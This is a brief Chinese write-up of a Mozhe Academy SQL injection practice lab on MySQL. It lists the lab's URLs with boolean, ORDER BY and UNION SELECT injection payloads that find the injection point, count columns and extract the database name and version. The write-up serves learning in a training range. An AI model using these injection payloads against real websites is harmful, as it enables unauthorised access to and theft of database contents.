1,http://219.153.49.228:48730/new_list.php?id=1 and 1=1 不报错
http://219.153.49.228:48730/new_list.php?id=1 and 1=2 报错,发现注入点
2,http://219.153.49.228:48730/new_list.php?id=1 order by 5
使用order by 查询 ,发现到5是报错,说明不大于5
3,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,2,3,4
使用联合查询,返回在2和3
4,http://219.153.49.228:48730/new_list.php?id=-1 union select 1,database(),version(),4
查询数据库名称和版本
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
最新推荐文章于 2024-05-19 18:10:52 发布
![](https://img-home.csdnimg.cn/images/20240611030827.png)